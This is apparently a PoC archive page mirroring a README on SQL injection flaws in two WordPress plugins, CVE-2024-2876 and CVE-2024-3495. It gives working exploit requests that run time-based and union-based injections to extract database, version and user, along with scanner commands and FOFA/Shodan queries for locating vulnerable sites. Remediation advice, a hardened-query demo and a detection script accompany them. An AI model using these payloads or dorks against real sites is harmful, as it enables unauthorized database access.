Associated vulnerability
Title:
WordPress Plugin email-subscribers SQL injection vulnerability
(CVE-2024-2876)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host a personal blog on a server running PHP and MySQL. A WordPress plugin is an application add-on. WordPress Plugin email-subscribers versions 5.7.14 and earlier contain a SQL injection vulnerability caused by insufficient escaping of user-supplied parameters in the run function of IG_ES_Subscribers_Query; an attacker can exploit it to append additional SQL queries
Description
WP-SQL-Injection CVE-2024-2876 AND CVE-2024-3495
Introduction
---
# WP-SQL Injection Vulnerabilities: CVE-2024-2876 and CVE-2024-3495
This repository documents two SQL injection vulnerabilities affecting WordPress plugins. Below are descriptions, queries, proof of concept (PoC) scripts, and remediation steps for each vulnerability.
## Vulnerability Descriptions
### Description - CVE-2024-2876
The **Email Subscribers by Icegram Express** plugin for WordPress (versions up to 5.7.14) is vulnerable to SQL injection in the `run` function of the `IG_ES_Subscribers_Query` class. Due to insufficient escaping and lack of SQL query preparation, unauthenticated attackers can exploit this vulnerability to inject malicious SQL, potentially accessing sensitive data.
### Description - CVE-2024-3495
The **Country State City Dropdown CF7** plugin for WordPress (versions up to 2.7.2) is vulnerable to SQL injection via the `cnt` and `sid` parameters. Because these user-supplied parameters are not sufficiently escaped, unauthenticated attackers can append arbitrary SQL to existing queries and extract sensitive information from the database.
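Both issues share one root cause: a user-controlled filter parameter is concatenated into SQL instead of being validated and bound. The following added example (not code from the plugins or this repository) models the `field`/`operator`/`value` condition shape seen in the CVE-2024-2876 request against a constructed SQLite subscriber table. `vulnerable_where` quotes only the value and splices the field name verbatim, which is the "insufficient escaping" pattern; `hardened_where` allow-lists the identifier and operator and binds the value as a parameter. The table, column names and allow-lists are assumptions for the demo.

```python
import sqlite3
from typing import Any, Callable

# Constructed sample data standing in for a subscriber table; an added
# illustration, not the plugin's real schema or code.
SAMPLE_ROWS = [
    (1, "alice@example.com", 1),
    (2, "bob@example.com", 2),
    (3, "carol@example.com", 1),
]

# Column names and operators the filter may use (assumed for this demo).
ALLOWED_FIELDS = {"id", "email", "status"}
ALLOWED_OPERATORS = {"=", "!=", "<", ">", "LIKE"}


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite table populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscribers (id INTEGER, email TEXT, status INTEGER)")
    conn.executemany("INSERT INTO subscribers VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_where(cond: dict[str, Any]) -> tuple[str, tuple]:
    """Insufficient escaping: only the value is quoted, while the field name and
    operator are concatenated verbatim, so a crafted field name rewrites the
    WHERE clause (the root cause described for CVE-2024-2876)."""
    value = str(cond["value"]).replace("'", "''")
    return f"({cond['field']} {cond['operator']} '{value}')", ()


def hardened_where(cond: dict[str, Any]) -> tuple[str, tuple]:
    """Allow-list the identifier and operator, bind the value as a parameter."""
    field, operator = cond["field"], cond["operator"]
    if field not in ALLOWED_FIELDS:
        raise ValueError(f"rejected field name: {field!r}")
    if operator not in ALLOWED_OPERATORS:
        raise ValueError(f"rejected operator: {operator!r}")
    return f"({field} {operator} ?)", (cond["value"],)


def run_query(conn: sqlite3.Connection,
              build_where: Callable[[dict[str, Any]], tuple[str, tuple]],
              cond: dict[str, Any]) -> list[int]:
    """Return the ids matching one advanced-filter condition."""
    where, params = build_where(cond)
    sql = f"SELECT id FROM subscribers WHERE {where} ORDER BY id"
    return [row[0] for row in conn.execute(sql, params)]


def is_rejected(conn: sqlite3.Connection, cond: dict[str, Any]) -> bool:
    """True when the hardened builder refuses the condition outright."""
    try:
        run_query(conn, hardened_where, cond)
    except ValueError:
        return True
    return False


# A legitimate filter, and a constructed malicious field name that follows the
# shape of the PoC above (close the parenthesis, then add a tautology).
LEGIT = {"field": "status", "operator": "=", "value": "1"}
INJECTED = {"field": "status=99924) OR (1=1) -- ", "operator": "=", "value": "1111"}

if __name__ == "__main__":
    conn = make_db()
    print("hardened, legit filter:", run_query(conn, hardened_where, LEGIT))      # [1, 3]
    print("vulnerable, injected:", run_query(conn, vulnerable_where, INJECTED))  # [1, 2, 3]
    print("hardened rejects injected field:", is_rejected(conn, INJECTED))      # True
```

Escaping the value alone does not help when the identifier is attacker-controlled; the fix in the patched plugin versions is the same in spirit: restrict identifiers to known columns and prepare the query, rather than trying to escape arbitrary SQL fragments.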
## Scanner Script
To scan a single target or a list of targets for CVE-2024-2876 and CVE-2024-3495, use the bundled script:
```bash
python3 CVE-2024-2876.py -u http://website.com
python3 CVE-2024-2876.py -f urls.txt
```
## Querying for Affected Sites
### Query for CVE-2024-2876
- **FOFA**: `body="/wp-content/plugins/email-subscribers/"`
- **publicwww**: `"/wp-content/plugins/email-subscribers/"`
### Query for CVE-2024-3495
- **FOFA**: `body="/wp-content/plugins/country-state-city-auto-dropdown" && header="HTTP/1.1 200 OK"`
- **Publicwww**: `"/wp-content/plugins/country-state-city-auto-dropdown"`
- **Shodan**: `"http.title:admin-ajax.php"`
## Proof of Concept (PoC) Code Blocks
### PoC - CVE-2024-2876
Example request exercising the time-based SQL injection via the `admin-post.php` endpoint (replayed with a 20 s timeout in Burp Suite):
```http
POST /wp-admin/admin-post.php HTTP/1.1
Host: <Host>
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
```
### PoC - CVE-2024-3495
Example request via `admin-ajax.php`:
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
```
## Remediation Steps
### Remediation for CVE-2024-2876
- **Upgrade**: Update the plugin to version 5.7.15 or later (preferably 5.7.19).
- **Automatic Updates**: Patchstack users can enable automatic updates for vulnerable plugins.
- **WAF/WAAP**: A Web Application Firewall (WAF) or Web Application and API Protection (WAAP) solution can block requests carrying known SQL injection patterns, reducing exposure until the plugin is updated.
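Signature lists of SQL keywords are easy to evade, so a WAF rule or log-inspection job for these two endpoints is more robust when it checks the expected shape of the parameters instead. The added example below (my own code, not part of this repository or either plugin) inspects decoded POST bodies: for the Email Subscribers advanced filter it requires every `advanced_filter[conditions][i][j][field]` value to be a plain column identifier, and for the `tc_csca_get_states` action it requires `cnt` and `sid` to be integers. The sample requests are constructed; the first two reuse the parameter shapes of the PoC requests shown above, and the "identifier" and "integer" expectations are assumptions about what legitimate plugin traffic looks like.

```python
import re
from urllib.parse import parse_qs

# Constructed request samples: the first two reproduce the parameter shapes of
# the PoC requests above, the last two are benign calls to the same endpoints.
SAMPLE_REQUESTS = [
    ("/wp-admin/admin-post.php",
     "page=es_subscribers&is_ajax=1&action=_sent"
     "&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+"
     "&advanced_filter[conditions][0][0][operator]=="
     "&advanced_filter[conditions][0][0][value]=1111"),
    ("/wp-admin/admin-ajax.php",
     "action=tc_csca_get_states&nonce_ajax=abc123"
     "&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),"
     "0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-"),
    ("/wp-admin/admin-post.php",
     "page=es_subscribers&is_ajax=1&action=_sent"
     "&advanced_filter[conditions][0][0][field]=status"
     "&advanced_filter[conditions][0][0][operator]=="
     "&advanced_filter[conditions][0][0][value]=1"),
    ("/wp-admin/admin-ajax.php", "action=tc_csca_get_states&nonce_ajax=abc123&cnt=101"),
]

# Expected shapes (assumptions for this example): a filter field is a bare
# column identifier, and a country/state id is a decimal integer.
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
INTEGER = re.compile(r"^[0-9]+$")
FIELD_KEY = re.compile(r"^advanced_filter\[conditions\]\[\d+\]\[\d+\]\[field\]$")


def inspect_request(path: str, body: str) -> list[str]:
    """Return findings for one POST request; an empty list means no suspicious shape."""
    params = parse_qs(body, keep_blank_values=True)
    findings: list[str] = []

    # Email Subscribers advanced filter: field names must be plain identifiers.
    if path.endswith("/admin-post.php") and params.get("page") == ["es_subscribers"]:
        for key, values in params.items():
            if FIELD_KEY.match(key):
                for value in values:
                    if not IDENTIFIER.match(value):
                        findings.append(
                            f"CVE-2024-2876 shape: field name {value!r} is not an identifier")

    # Country State City Dropdown CF7: cnt and sid must be integers.
    if path.endswith("/admin-ajax.php") and params.get("action") == ["tc_csca_get_states"]:
        for name in ("cnt", "sid"):
            for value in params.get(name, []):
                if not INTEGER.match(value):
                    findings.append(
                        f"CVE-2024-3495 shape: {name}={value!r} is not an integer")
    return findings


def scan(requests: list[tuple[str, str]]) -> list[int]:
    """Indexes of the requests that produced at least one finding."""
    return [i for i, (path, body) in enumerate(requests) if inspect_request(path, body)]


if __name__ == "__main__":
    for i, (path, body) in enumerate(SAMPLE_REQUESTS):
        for finding in inspect_request(path, body):
            print(f"request {i} {path}: {finding}")
    print("flagged:", scan(SAMPLE_REQUESTS))  # [0, 1]
```

Because the check is positive (what a valid parameter must look like) rather than negative (which keywords to forbid), encoding tricks and comment variants in the payload do not matter: anything that is not a bare identifier or an integer is reported. Note that ordinary access logs do not record POST bodies, so this needs to run where the body is visible, for example in a WAF rule or a request-logging middleware.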
## Bounty Information - CVE-2024-2876
For more information on the CVE and bounty details, visit:
- [Wordfence Blog on CVE-2024-2876](https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/)
---
File snapshot
[4.0K] /data/pocs/a3bc78d8f796ee9aac53f3c7ae26677705f15ec7
├── [5.1K] CVE-2024-2876.py
├── [ 845] CVE-2024-2876.yaml
├── [ 944] CVE-2024-3495.yaml
└── [3.5K] README.md
0 directories, 4 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has disappeared or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.